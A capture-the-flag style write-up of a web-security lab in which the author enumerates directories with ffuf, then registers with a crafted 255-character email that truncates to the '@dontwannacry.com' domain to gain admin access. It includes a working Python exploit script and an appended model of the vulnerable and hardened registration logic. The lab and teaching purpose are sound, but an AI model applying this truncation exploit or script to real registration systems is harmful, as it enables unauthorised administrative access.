Inconsistent handling of exceptional input

This lab doesn't adequately validate user input. You can exploit a logic flaw in its account registration process to gain access to administrative functionality. To solve the lab, access the admin panel and delete the user carlos.

I initially navigated directly to the '/register' page to observe how it processes my input. Notably, there's a note specifying that individuals affiliated with DontWannaCry should use their '@dontwannacry.com' email addresses. I decided to set this information aside for potential future use.

(Screenshot: the /register page)

I'll be running some enumeration in the background to ensure comprehensive coverage. If I encounter any obstacles, I can then explore alternative approaches.

➜  ~ ffuf -k -u https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

admin                   [Status: 401, Size: 5809, Words: 1885, Lines: 86, Duration: 43ms]

Upon initiation, I promptly identified an 'admin' directory. Without hesitation, I decided to explore its contents:

(Screenshot: the /admin page)

I took note that to access the admin interface, logging in as a DontWannaCry user is required.

In an attempt to exploit potential vulnerabilities, I experimented with user registration. One intriguing behavior emerged when I provided an excessively long string in the email parameter, surpassing the typical 255-character limit. After confirming the registration in the email client 'attacker@exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net' and logging in with the new user, I observed that the stored email had been truncated to precisely 255 characters.

Recalling the necessity to log in as a DontWannaCry user with the domain '@dontwannacry.com', I conceived an idea: crafting an email string so that, even after truncation to 255 characters, it would still end in '@dontwannacry.com', while the full, untruncated address still delivers the confirmation email to my exploit server.

So my new email will look something like this:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dontwannacry.com.exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net

After confirming the registration through the email client, I successfully logged in and gained access to the admin panel. Subsequently, I proceeded to delete the 'carlos' user, successfully resolving the lab.

Here I wrote a simple Python script to register with the crafted email:

import requests

# Lab and exploit-server hostnames as used in this writeup. The session cookie and
# CSRF token are tied to a browser session and must be copied from a fresh one.
url = "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net:443/register"
cookies = {"session": "QcfYeIhElK2zKXRJVod0WoqKCe771Fyu"}
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net",
    "Referer": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net/register",
}

# The application keeps only the first 255 characters of the email, so place
# '@dontwannacry.com' so that it ends exactly at character 255; the full address
# still resolves to the exploit server, which receives the confirmation mail.
buff = 255 - len("@dontwannacry.com")
mail = "a" * buff + "@dontwannacry.com" + ".exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net"
data = {"csrf": "7vRFv3AwJWXgH6JNp5pNwkOCCKUxfBQj", "username": "ichyaboy", "email": mail, "password": "password"}

response = requests.post(url, headers=headers, cookies=cookies, data=data)
print(response.status_code)
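The root cause here is that the application confirms one value (the full address the confirmation mail is delivered to) but stores, and later authorizes on, a different one (the 255-character truncation). As an added illustration that is not part of the original writeup or the lab's code, the model below reproduces that registration logic beside a hardened version that rejects over-length input and derives every decision from a single canonical value; `MAX_EMAIL_LEN`, the function names, the regex and the placeholder exploit-server hostname are assumptions.

```python
import re

MAX_EMAIL_LEN = 255                 # assumed column width the vulnerable store truncates to
TRUSTED_DOMAIN = "dontwannacry.com"
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")   # deliberately simple syntax check


def mailbox_domain(email: str) -> str:
    """Domain the confirmation mail would actually be delivered to."""
    return email.rsplit("@", 1)[1]


def register_vulnerable(email: str) -> dict:
    """Models the lab: validate and confirm the full address, persist a truncated copy."""
    if not EMAIL_RE.match(email):
        raise ValueError("invalid email")
    confirmed_via = mailbox_domain(email)          # mail goes to the full address
    stored = email[:MAX_EMAIL_LEN]                 # silent truncation at persistence
    is_admin = stored.endswith("@" + TRUSTED_DOMAIN)   # authorization reads the stored value
    return {"confirmed_via": confirmed_via, "stored": stored, "is_admin": is_admin}


def register_hardened(email: str) -> dict:
    """Same decisions, but an explicit length check and one canonical value throughout."""
    if len(email) > MAX_EMAIL_LEN:
        raise ValueError("email exceeds %d characters" % MAX_EMAIL_LEN)
    if not EMAIL_RE.match(email):
        raise ValueError("invalid email")
    confirmed_via = mailbox_domain(email)
    is_admin = confirmed_via == TRUSTED_DOMAIN     # exact match on the confirmed domain
    return {"confirmed_via": confirmed_via, "stored": email, "is_admin": is_admin}


def hardened_rejects(email: str) -> bool:
    """True when the hardened path refuses the input outright."""
    try:
        register_hardened(email)
    except ValueError:
        return True
    return False


def sample_input() -> str:
    """Constructed input shaped like the writeup's: 255 chars ending in the trusted domain,
    then an attacker-controlled suffix (the exploit-server hostname is a placeholder)."""
    attacker_host = "exploit-PLACEHOLDER.exploit-server.net"
    prefix = "a" * (MAX_EMAIL_LEN - len("@" + TRUSTED_DOMAIN))
    return prefix + "@" + TRUSTED_DOMAIN + "." + attacker_host
```

Run against `sample_input()`, the vulnerable model confirms via the attacker's host yet grants admin on the stored value, while the hardened model refuses the input before any state is written.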
